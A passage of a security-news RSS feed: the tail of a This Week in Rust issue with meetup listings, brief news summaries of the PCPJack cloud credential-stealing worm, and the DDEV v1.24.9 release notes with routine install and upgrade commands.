<li><a href="https://www.meetup.com/bostonrust/events/314480527/"><strong>Alewife Rust Lunch, May 2</strong></a></li>
</ul>
</li>
<li>2026-05-07 | Saint Louis, MO, US | <a href="https://www.meetup.com/stl-rust">STL Rust</a><ul>
<li><a href="https://www.meetup.com/stl-rust/events/313807225/"><strong>Open Project Night</strong></a></li>
</ul>
</li>
<li>2026-05-09 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust">Boston Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/bostonrust/events/314480529/"><strong>Back Bay Rust Lunch, May 9</strong></a></li>
</ul>
</li>
<li>2026-05-14 | Portland, OR, US | <a href="https://www.meetup.com/pdxrust">PDXRust</a><ul>
<li><a href="https://www.meetup.com/pdxrust/events/314256732/"><strong>From Radio Waves to Pixels - Real-Time Visualizations with Rust and WebAssembly</strong></a></li>
</ul>
</li>
<li>2026-05-14 | San Diego, CA, US | <a href="https://www.meetup.com/san-diego-rust">San Diego Rust</a><ul>
<li><a href="https://www.meetup.com/san-diego-rust/events/313721886/"><strong>San Diego Rust May Meetup - Back in person!</strong></a></li>
</ul>
</li>
<li>2026-05-16 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust">Boston Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/bostonrust/events/314480531/"><strong>Lechmere Rust Lunch, May 16</strong></a></li>
</ul>
</li>
<li>2026-05-19 | San Francisco, CA, US | <a href="https://www.meetup.com/san-francisco-rust-study-group">San Francisco Rust Study Group</a><ul>
<li><a href="https://www.meetup.com/san-francisco-rust-study-group/events/314154841/"><strong>Rust Hacking in Person</strong></a></li>
</ul>
</li>
<li>2026-05-20 | Hybrid (Vancouver, BC, CA) | <a href="https://www.meetup.com/vancouver-rust">Vancouver Rust</a><ul>
<li><a href="https://www.meetup.com/vancouver-rust/events/313572925/"><strong>Mouse Control with Rust</strong></a></li>
</ul>
</li>
<li>2026-05-20 | San Francisco, CA, US | <a href="https://luma.com/bayarearust">Bay Area Rust Meetup</a><ul>
<li><a href="https://luma.com/9j3q5ejl"><strong>Bay Area Rust Meetup</strong></a></li>
</ul>
</li>
<li>2026-05-21 | Hybrid (Seattle, WA, US) | <a href="https://www.meetup.com/join-srug">Seattle Rust User Group</a><ul>
<li><a href="https://www.meetup.com/seattle-rust-user-group/events/313873203/"><strong>May, 2026 SRUG (Seattle Rust User Group) Meetup</strong></a></li>
</ul>
</li>
<li>2026-05-21 | Nashville, TN, US | <a href="https://www.meetup.com/music-city-rust-developers">Music City Rust Developers</a><ul>
<li><a href="https://www.meetup.com/music-city-rust-developers/events/314359076/"><strong>Community Meetup</strong></a></li>
</ul>
</li>
<li>2026-05-23 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust">Boston Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/bostonrust/events/314480534/"><strong>Allston Rust Lunch, May 23</strong></a></li>
</ul>
</li>
<li>2026-05-27 | Austin, TX, US | <a href="https://www.meetup.com/rust-atx">Rust ATX</a><ul>
<li><a href="https://www.meetup.com/rust-atx/events/314209662/"><strong>Rust Lunch - Fareground</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#oceania">Oceania</a></h5>
<ul>
<li>2026-05-14 | Melbourne, AU | <a href="https://www.meetup.com/rust-melbourne">Rust Melbourne</a><ul>
<li><a href="https://www.meetup.com/rust-melbourne/events/314260890/"><strong>Rust Melbourne - May 2026</strong></a></li>
</ul>
</li>
<li>2026-05-26 | Barton, ACT, AU | <a href="https://www.meetup.com/rust-canberra">Canberra Rust User Group</a><ul>
<li><a href="https://www.meetup.com/rust-canberra/events/314050576/"><strong>May Meetup</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#south-america">South America</a></h5>
<ul>
<li>2026-05-13 | Montevideo, UY | <a href="https://www.meetup.com/rust-uruguay">Rust Meetup Uruguay</a><ul>
<li><a href="https://www.meetup.com/rust-uruguay/events/314532884/"><strong>Rust Uruguay meetup de Mayo</strong></a></li>
</ul>
</li>
</ul>
<p>If you are running a Rust event please add it to the <a href="https://www.google.com/calendar/embed?src=apd9vmbc22egenmtu5l6c5jbfc%40group.calendar.google.com">calendar</a> to get
it mentioned here. Please remember to add a link to the event too.
Email the <a href="mailto:community-team@rust-lang.org">Rust Community Team</a> for access.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#jobs">Jobs</a></h4>
<p>Please see the latest <a href="https://www.reddit.com/r/rust/comments/1sobu1s/official_rrust_whos_hiring_thread_for_jobseekers/">Who's Hiring thread on r/rust</a></p>
<h3><a class="toclink" href="https://this-week-in-rust.org/atom.xml#quote-of-the-week">Quote of the Week</a></h3>


<blockquote>
<p>Sometimes, the best projects are the ones you never thought you could build.</p>
</blockquote>
<p>– <a href="https://chrisdell.info/using-rust-to-build-a-1-dollar-handheld-gaming-console/">Chris Dell on his blog</a></p>
<p>Another week bereft of any quote suggestions. llogiq is glad to have found this anyway.</p>
<p><a href="https://users.rust-lang.org/t/twir-quote-of-the-week/328">Please submit quotes and vote for next week!</a></p>
<p>This Week in Rust is edited by:</p>
<ul>
<li><a href="https://github.com/nellshamrell">nellshamrell</a></li>
<li><a href="https://github.com/llogiq">llogiq</a></li>
<li><a href="https://github.com/ericseppanen">ericseppanen</a></li>
<li><a href="https://github.com/extrawurst">extrawurst</a></li>
<li><a href="https://github.com/U007D">U007D</a></li>
<li><a href="https://github.com/mariannegoldin">mariannegoldin</a></li>
<li><a href="https://github.com/bdillo">bdillo</a></li>
<li><a href="https://github.com/opeolluwa">opeolluwa</a></li>
<li><a href="https://github.com/bnchi">bnchi</a></li>
<li><a href="https://github.com/KannanPalani57">KannanPalani57</a></li>
<li><a href="https://github.com/tzilist">tzilist</a></li>
</ul>
<p><em>Email list hosting is sponsored by <a href="https://foundation.rust-lang.org/">The Rust Foundation</a></em></p>
<p><small><a href="https://www.reddit.com/r/rust/comments/1szloah/this_week_in_rust_649/">Discuss on r/rust</a></small></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[New PCPJack Worm Targets Docker, Kubernetes, Redis, and MongoDB for Credential Theft]]></title>
<description><![CDATA[A sophisticated new malware framework called PCPJack has been found actively targeting cloud environments across the internet, hunting for exposed services and stripping away credentials at scale. The worm zeroes in on Docker, Kubernetes, Redis, and MongoDB deployments, turning misconfigured…
Rea...]]></description>
<link>https://tsecurity.de/de/3499028/it-security-nachrichten/new-pcpjack-worm-targets-docker-kubernetes-redis-and-mongodb-for-credential-theft/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3499028/it-security-nachrichten/new-pcpjack-worm-targets-docker-kubernetes-redis-and-mongodb-for-credential-theft/</guid>
<pubDate>Fri, 08 May 2026 13:09:34 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A sophisticated new malware framework called PCPJack has been found actively targeting cloud environments across the internet, hunting for exposed services and stripping away credentials at scale. The worm zeroes in on Docker, Kubernetes, Redis, and MongoDB deployments, turning misconfigured…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/new-pcpjack-worm-targets-docker-kubernetes-redis-and-mongodb-for-credential-theft/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/new-pcpjack-worm-targets-docker-kubernetes-redis-and-mongodb-for-credential-theft/">New PCPJack Worm Targets Docker, Kubernetes, Redis, and MongoDB for Credential Theft</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[New PCPJack Worm Targets Docker, Kubernetes, Redis, and MongoDB for Credential Theft]]></title>
<description><![CDATA[A sophisticated new malware framework called PCPJack has been found actively targeting cloud environments across the internet, hunting for exposed services and stripping away credentials at scale. The worm zeroes in on Docker, Kubernetes, Redis, and MongoDB deployments, turning misconfigured or v...]]></description>
<link>https://tsecurity.de/de/3498961/it-security-nachrichten/new-pcpjack-worm-targets-docker-kubernetes-redis-and-mongodb-for-credential-theft/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3498961/it-security-nachrichten/new-pcpjack-worm-targets-docker-kubernetes-redis-and-mongodb-for-credential-theft/</guid>
<pubDate>Fri, 08 May 2026 12:54:40 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A sophisticated new malware framework called PCPJack has been found actively targeting cloud environments across the internet, hunting for exposed services and stripping away credentials at scale. The worm zeroes in on Docker, Kubernetes, Redis, and MongoDB deployments, turning misconfigured or vulnerable systems into footholds for credential theft and financial fraud. What sets it apart […]</p>
<p>The post <a href="https://cybersecuritynews.com/new-pcpjack-worm-targets-docker/">New PCPJack Worm Targets Docker, Kubernetes, Redis, and MongoDB for Credential Theft</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[PCPJack Worm Attacks Docker, Kubernetes, Redis, and MongoDB]]></title>
<description><![CDATA[A new password-stealing malware called PCPJack that is actively spreading through exposed cloud systems. The advanced toolset targets services like Docker, Kubernetes, Redis, MongoDB, and vulnerable web applications. Once inside a network, PCPJack steals sensitive passwords and keys from cloud pl...]]></description>
<link>https://tsecurity.de/de/3498429/it-security-nachrichten/pcpjack-worm-attacks-docker-kubernetes-redis-and-mongodb/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3498429/it-security-nachrichten/pcpjack-worm-attacks-docker-kubernetes-redis-and-mongodb/</guid>
<pubDate>Fri, 08 May 2026 09:54:40 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A new password-stealing malware called PCPJack that is actively spreading through exposed cloud systems. The advanced toolset targets services like Docker, Kubernetes, Redis, MongoDB, and vulnerable web applications. Once inside a network, PCPJack steals sensitive passwords and keys from cloud platforms, containers, and financial accounts. Unlike most cloud malware, it completely avoids installing software to […]</p>
<p>The post <a href="https://cyberpress.org/pcpjack-targets-cloud-infrastructure/">PCPJack Worm Attacks Docker, Kubernetes, Redis, and MongoDB</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[PCPJack Worm Targets Docker, Kubernetes, Redis, and MongoDB Credentials]]></title>
<description><![CDATA[A newly identified malware framework dubbed PCPJack is targeting exposed cloud and container infrastructure to steal credentials at scale while actively removing artifacts linked to the TeamPCP threat actor. Unlike typical cloud-focused campaigns, PCPJack skips cryptomining entirely and instead a...]]></description>
<link>https://tsecurity.de/de/3498199/it-security-nachrichten/pcpjack-worm-targets-docker-kubernetes-redis-and-mongodb-credentials/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3498199/it-security-nachrichten/pcpjack-worm-targets-docker-kubernetes-redis-and-mongodb-credentials/</guid>
<pubDate>Fri, 08 May 2026 08:39:31 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A newly identified malware framework dubbed PCPJack is targeting exposed cloud and container infrastructure to steal credentials at scale while actively removing artifacts linked to the TeamPCP threat actor. Unlike typical cloud-focused campaigns, PCPJack skips cryptomining entirely and instead appears optimized for fraud, spam, extortion, and resale of stolen access. TeamPCP itself drew attention earlier in 2026 […]</p>
<p>The post <a href="https://gbhackers.com/pcpjack-worm-framework/">PCPJack Worm Targets Docker, Kubernetes, Redis, and MongoDB Credentials</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[PCPJack Worm Targets Docker, Kubernetes, Redis, and MongoDB Credentials]]></title>
<description><![CDATA[A newly identified malware framework dubbed PCPJack is targeting exposed cloud and container infrastructure to steal credentials at scale while actively removing artifacts linked to the TeamPCP threat actor. Unlike typical cloud-focused campaigns, PCPJack skips cryptomining entirely and instead a...]]></description>
<link>https://tsecurity.de/de/3498197/it-security-nachrichten/pcpjack-worm-targets-docker-kubernetes-redis-and-mongodb-credentials/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3498197/it-security-nachrichten/pcpjack-worm-targets-docker-kubernetes-redis-and-mongodb-credentials/</guid>
<pubDate>Fri, 08 May 2026 08:39:28 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A newly identified malware framework dubbed PCPJack is targeting exposed cloud and container infrastructure to steal credentials at scale while actively removing artifacts linked to the TeamPCP threat actor. Unlike typical cloud-focused campaigns, PCPJack skips cryptomining entirely and instead appears optimized for…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/pcpjack-worm-targets-docker-kubernetes-redis-and-mongodb-credentials/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/pcpjack-worm-targets-docker-kubernetes-redis-and-mongodb-credentials/">PCPJack Worm Targets Docker, Kubernetes, Redis, and MongoDB Credentials</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v1.24.9]]></title>
<description><![CDATA[Installation
See the installation instructions for details, but it's easy:

macOS: brew install ddev/ddev/ddev or just brew upgrade ddev.
Linux: Use sudo apt-get update && sudo apt-get install ddev, see apt/yum installation
Windows and WSL2: Download the ddev_windows_amd64_installer.v1.24.9.exe; ...]]></description>
<link>https://tsecurity.de/de/3497299/downloads/v1249/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3497299/downloads/v1249/</guid>
<pubDate>Thu, 07 May 2026 22:17:23 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Installation</h2>
<p>See the <a href="https://docs.ddev.com/en/stable/users/install/ddev-installation/" rel="nofollow">installation instructions</a> for details, but it's easy:</p>
<ul>
<li>macOS: <code>brew install ddev/ddev/ddev</code> or just <code>brew upgrade ddev</code>.</li>
<li>Linux: Use <code>sudo apt-get update &amp;&amp; sudo apt-get install ddev</code>, see <a href="https://docs.ddev.com/en/stable/users/install/ddev-installation/#linux" rel="nofollow">apt/yum installation</a></li>
<li>Windows and WSL2: Download the <a href="https://github.com/ddev/ddev/releases/download/v1.24.9/ddev_windows_amd64_installer.v1.24.9.exe">ddev_windows_amd64_installer.v1.24.9.exe</a>; you can run it for install or upgrade.</li>
<li>Consider <code>ddev delete images</code> or <code>ddev delete images --all</code> after upgrading to free up disk space used by previous Docker image versions. This does no harm.</li>
<li>Consider <code>ddev config --auto</code> to update your projects to current configuration.</li>
</ul>
<h2>⚠ Warning</h2>
<p>DDEV v1.24.9 release introduced a regression affecting CI environments (e.g., GitHub Actions) when using custom project TLDs. <strong>Do not use v1.24.9 in CI.</strong> Upgrade to v1.24.10 instead. Local-only users are unaffected.</p>
<h2>Highlights</h2>
<ul>
<li>Support for PHP 8.5.0 RC 3 (note: some extensions are not yet available: apcu, imagick, memcached, redis, uploadprogress, xdebug, xhprof, xmlrpc, yaml)</li>
<li>Support for PostgreSQL 18</li>
<li><a href="https://docs.ddev.com/en/stable/users/usage/managing-projects/#access-another-project-via-https" rel="nofollow">Automatic HTTP/S communication between DDEV projects</a> - no need to manually configure <code>external_links</code></li>
<li><a href="https://docs.ddev.com/en/stable/users/configuration/config/#omit_project_name_by_default" rel="nofollow">Option to omit project names</a> in <code>.ddev/config.yaml</code> by default with <code>ddev config global --omit-project-name-by-default=true</code> - useful when working with multiple Git worktrees</li>
<li>Auto-discovery of <code>PLATFORM_PROJECT</code> and <code>PLATFORM_ENVIRONMENT</code> from existing config for <a href="https://docs.ddev.com/en/stable/users/providers/upsun/#upsun-per-project-configuration" rel="nofollow">Upsun Flex</a> and <a href="https://docs.ddev.com/en/stable/users/providers/platform/#upsun-fixedplatformsh-per-project-configuration" rel="nofollow">Upsun Fixed (Platform.sh)</a> provider integrations</li>
</ul>
<h2>Features</h2>
<ul>
<li>New <a href="https://docs.ddev.com/en/stable/users/usage/commands/#utility-diagnose" rel="nofollow"><code>ddev utility diagnose</code></a> command for quick diagnostics on your DDEV installation and current project</li>
<li>New <a href="https://docs.ddev.com/en/stable/users/usage/commands/#add-on-search" rel="nofollow"><code>ddev add-on search</code></a> command, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AkibaAT/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AkibaAT">@AkibaAT</a></li>
<li>New <a href="https://docs.ddev.com/en/stable/users/usage/commands/#xdebug" rel="nofollow"><code>ddev xdebug info</code></a> command to display <code>xdebug_info()</code> output</li>
<li>Customize <a href="https://docs.ddev.com/en/stable/users/usage/commands/#describe" rel="nofollow"><code>ddev describe</code></a> output using the <a href="https://docs.ddev.com/en/stable/users/extend/custom-docker-services/#customizing-ddev-describe-output" rel="nofollow"><code>x-ddev.describe-*</code> extensions</a> - useful for <a href="https://addons.ddev.com/" rel="nofollow">add-ons</a></li>
<li>Change <a href="https://docs.ddev.com/en/stable/users/usage/commands/#ssh" rel="nofollow"><code>ddev ssh</code></a> shell using the <a href="https://docs.ddev.com/en/stable/users/extend/in-container-configuration/#changing-ddev-ssh-shell" rel="nofollow"><code>x-ddev.ssh-shell</code> extension</a> - useful for <a href="https://addons.ddev.com/" rel="nofollow">add-ons</a></li>
<li>New <code>--user</code>/<code>-u</code> flag for <a href="https://docs.ddev.com/en/stable/users/usage/commands/#exec" rel="nofollow"><code>ddev exec</code></a> and <a href="https://docs.ddev.com/en/stable/users/usage/commands/#ssh" rel="nofollow"><code>ddev ssh</code></a></li>
<li><code>exec</code> hooks now <a href="https://docs.ddev.com/en/stable/users/configuration/hooks/#exec-execute-a-shell-command-in-a-container-defaults-to-web-container" rel="nofollow">support the <code>user</code> field</a></li>
<li>New <code>pre-share</code> and <code>post-share</code> <a href="https://docs.ddev.com/en/stable/users/configuration/hooks/" rel="nofollow">hooks</a>. This can help change the required URL for <code>ddev share</code> in CMSs like WordPress and Magento2.</li>
<li>PostgreSQL connection support in <a href="https://docs.ddev.com/en/stable/users/usage/commands/#heidisql" rel="nofollow"><code>ddev heidisql</code></a>, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/raphaelportmann/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/raphaelportmann">@raphaelportmann</a></li>
<li>Show failed container logs on project start by running <code>DDEV_DEBUG=true ddev start</code></li>
<li>Enhanced <a href="https://docs.ddev.com/en/stable/users/configuration/config/#composer_root" rel="nofollow"><code>composer_root</code></a> support for app <a href="https://docs.ddev.com/en/stable/users/configuration/config/#type" rel="nofollow"><code>type</code></a> detection in CakePHP, Craft CMS, Laravel, Magento 2, Shopware 6, and Symfony, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vanWittlaer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vanWittlaer">@vanWittlaer</a> for initial PR for Shopware 6</li>
<li>Silence warnings about custom configuration files in the <code>.ddev</code> directory by adding <code>#ddev-silent-no-warn</code> to the file. <a href="https://docs.ddev.com/en/stable/users/usage/faq/#what-if-i-dont-like-the-settings-files-or-gitignores-ddev-creates" rel="nofollow">Documentation</a></li>
</ul>
<h2>Bug Fixes</h2>
<ul>
<li>PostgreSQL now runs as container user (mirrored from host user) instead of <code>postgres:postgres</code></li>
<li><a href="https://docs.ddev.com/en/stable/users/usage/commands/#describe" rel="nofollow"><code>ddev describe</code></a> now works with stopped or broken containers</li>
<li>Improved support for <code>DDEV_*</code> environment variables in PHP-based add-ons</li>
<li><code>APP_DEFAULT_LOCALE</code> is no longer overridden in CakePHP, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tyler36/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tyler36">@tyler36</a></li>
<li>Removed hardcoded <code>--server-id=0</code> parameter from MySQL/MariaDB startup, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cyppe/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cyppe">@cyppe</a></li>
<li>Fixed <code>docker-compose</code> warnings on <code>ddev start</code> when project root <code>.env</code> file contains dollar signs</li>
<li><a href="https://docs.ddev.com/en/stable/users/usage/commands/#add-on-get" rel="nofollow"><code>ddev add-on get</code></a> now retries without authentication on invalid GitHub token</li>
<li>Debug and verbose output now suppressed when using <code>--json-output</code>/<code>-j</code> flag</li>
<li>Non-interactive mode now forced in non-tty environments</li>
<li>Improved container username sanitization with better fallback handling</li>
<li>Fixed <code>blackfire-php</code> installation for older PHP versions</li>
<li>Fixed bug with broken label in Mutagen volume when path to Docker socket is too long</li>
<li>Fixed intermittent hang in <code>ddev auth ssh</code> when SSH key is password-protected</li>
<li>Fixed hang in <code>ddev start</code> on macOS when temp directory permissions are broken after macOS upgrade (fixed in <code>docker-compose</code>)</li>
</ul>
<h2>Internal Improvements</h2>
<ul>
<li>PHP 8.1 no longer preinstalled in <a href="https://hub.docker.com/r/ddev/ddev-webserver" rel="nofollow">ddev/ddev-webserver</a> to reduce image size</li>
<li>Native ARM builder now used for building DDEV Docker images, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AkibaAT/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AkibaAT">@AkibaAT</a></li>
<li><a href="https://docs.ddev.com/en/stable/users/usage/commands/#utility" rel="nofollow"><code>ddev utility</code></a> is now the primary command (<code>ddev debug</code> moved to alias)</li>
<li>Healthcheck added to <a href="https://hub.docker.com/r/ddev/ddev-xhgui" rel="nofollow">ddev/ddev-xhgui</a> image</li>
<li>Linux tests now run separately instead of in matrix, allowing single test restarts on failure</li>
<li>Improved support for <code>CI=true</code> in GitHub Actions</li>
<li>Vite setup documentation migrated into <a href="https://docs.ddev.com/en/stable/users/usage/vite/" rel="nofollow">DDEV docs</a>, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mandrasch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mandrasch">@mandrasch</a> for continuous support on the <a href="https://ddev.com/blog/working-with-vite-in-ddev/" rel="nofollow">blog article</a></li>
<li>Improved <a href="https://docs.ddev.com/en/stable/users/quickstart/" rel="nofollow">quickstarts</a> code block formatting to resolve copy/paste issues in some terminals</li>
<li>Added <code>docker-buildx</code> dependency for <a href="https://aur.archlinux.org/packages/ddev-bin" rel="nofollow">AUR</a> installation</li>
<li>Internet detection now uses <code>one.one.one.one</code> instead of <code>test.ddev.site</code></li>
<li>Replaced <code>GITHUB_OWNER</code> with <code>DDEV_GITHUB_OWNER</code> in <a href="https://ddev.com/install.sh" rel="nofollow">https://ddev.com/install.sh</a></li>
<li>Switched to lightweight <a href="https://mcr.microsoft.com/en-us/artifact/mar/devcontainers/base/about" rel="nofollow">debian-12</a> image for GitHub Codespaces</li>
<li>Removed Gitpod configuration (service is <a href="https://ona.com/stories/gitpod-classic-payg-sunset" rel="nofollow">no longer available</a>)</li>
</ul>
<h2>Minor Updates</h2>
<ul>
<li>PHP 8.3.27, 8.4.14, and 8.5.0 RC 3</li>
<li>Docker Compose v2.40.3</li>
<li>Updated <a href="https://docs.ddev.com/en/stable/users/quickstart/#moodle" rel="nofollow">quickstart</a> for <a href="https://moodledev.io/general/releases/5.1" rel="nofollow">Moodle 5.1</a></li>
</ul>
<h2>What's Changed</h2>
<ul>
<li>build(aur): add docker-buildx dependency by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3427998201" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7637" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7637/hovercard" href="https://github.com/ddev/ddev/pull/7637">#7637</a></li>
<li>docs: Merge AI instruction files AGENTS.md CLAUDE.md copilot-instructions.md, symlink, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3425487467" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7632" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7632/hovercard" href="https://github.com/ddev/ddev/issues/7632">#7632</a> [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3437151146" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7644" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7644/hovercard" href="https://github.com/ddev/ddev/pull/7644">#7644</a></li>
<li>docs(faq): remove traefik config when changing project's name, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3432283969" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7638" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7638/hovercard" href="https://github.com/ddev/ddev/issues/7638">#7638</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ara303/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ara303">@ara303</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3432583948" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7639" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7639/hovercard" href="https://github.com/ddev/ddev/pull/7639">#7639</a></li>
<li>chore(deps): update vendor to current, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3419688927" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7624" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7624/hovercard" href="https://github.com/ddev/ddev/issues/7624">#7624</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3437116266" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7643" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7643/hovercard" href="https://github.com/ddev/ddev/pull/7643">#7643</a></li>
<li>fix(upsun): upsun should resume paused environment at start [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3445318704" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7650" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7650/hovercard" href="https://github.com/ddev/ddev/pull/7650">#7650</a></li>
<li>feat(docker): auto HTTP/S communication via network aliases instead of external_links by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3434920736" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7642" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7642/hovercard" href="https://github.com/ddev/ddev/pull/7642">#7642</a></li>
<li>test: fix TestNetworkAliases, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3450067740" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7657" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7657/hovercard" href="https://github.com/ddev/ddev/issues/7657">#7657</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3450164194" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7658" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7658/hovercard" href="https://github.com/ddev/ddev/pull/7658">#7658</a></li>
<li>feat: enhance PHP addon environment with DockerEnv() integration by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3446430956" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7651" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7651/hovercard" href="https://github.com/ddev/ddev/pull/7651">#7651</a></li>
